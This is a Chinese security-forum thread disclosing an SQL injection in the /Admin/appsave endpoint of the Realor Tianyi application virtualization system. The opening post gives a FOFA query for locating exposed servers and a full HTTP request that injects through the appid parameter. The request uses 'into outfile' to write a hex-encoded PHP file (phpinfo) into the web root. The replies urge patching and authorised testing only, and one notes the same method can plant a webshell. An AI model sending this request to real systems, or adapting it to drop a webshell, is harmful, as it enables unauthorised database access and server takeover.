Anonymous 发表于 2024-5-10 23:08:35

瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 漏洞描述
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞,攻击者可以利用此漏洞获得数据库和WEB主机权限。

CVE编号:

CNNVD编号:

CNVD编号:
3.影响版本
瑞友天翼应用虚拟化系统


瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞4.fofa查询语句
app="REALOR-天翼应用虚拟化系统"
5.漏洞复现
漏洞链接:http://xxx.xxx.xxx.xxx/index.php ... %5C229775.xgi%27%23

漏洞数据包:
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f70687020706870696e666f28293b203f3e%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5C229775.xgi%27%23 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xxx.xxx.xxx.xxx
其中3c3f70687020706870696e666f28293b203f3e 是 <?php phpinfo(); ?> 的16进制编码






写入的文件访问路径http://xxx.xxx.xxxx.xxxx/229775.xgi




a10001 发表于 2025-2-10 13:33:50

好东西虽然看不懂,但是很高级

回复小弟1 发表于 2026-5-19 13:40:02

Re: 瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞

感谢分享,漏洞信息很详细,复现步骤和数据包都写得很清楚,方便安全人员自查。提醒使用瑞友天翼应用虚拟化系统的用户及时关注官方更新或采取临时防护措施,避免被恶意利用。同时也请各位严格遵守法律法规,仅用于授权测试。

热心网友3 发表于 2026-5-27 12:00:00

Re: 瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞

感谢分享这个漏洞情报。瑞友天翼应用虚拟化系统的SQL注入漏洞确实危害较大,攻击者可以通过appid参数注入恶意SQL,结合into outfile写入webshell,从而获取服务器控制权限。大家应尽快排查自身部署环境,确认是否存在受影响版本,并采取限制管理后台访问、更新补丁或临时禁用相关接口等防护措施。再次提醒:安全测试请务必在合法授权范围内进行。

热心网友6 发表于 2026-6-19 09:10:00

Re: 瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞

感谢分享这个漏洞信息。SQL注入漏洞确实属于高危问题,攻击者可能通过构造恶意请求获取数据库甚至系统权限,影响面较大。建议使用该系统的用户尽快排查相关版本,并做好访问控制、输入过滤和补丁更新,防止被恶意利用。再次提醒大家注意技术研究的合法合规性。

热心网友6 发表于 2026-6-19 14:00:01

Re: 瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞

感谢分享这个漏洞信息,内容很详细,包括漏洞描述、影响版本、fofa查询语法以及完整的复现数据包,对安全测试和防护都有参考价值。 特别赞同首帖的免责声明,提醒大家进行合法授权下的测试,避免对未授权的目标造成影响。 想请问一下楼主:官方目前是否有针对此漏洞的修复补丁或临时缓解措施?比如过滤appid参数、限制写入路径等。这个漏洞利用条件是否需要在已登录Admin后台的情况下触发?了解这些能帮助管理员更好地评估风险。
页: [1]
查看完整版本: 瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞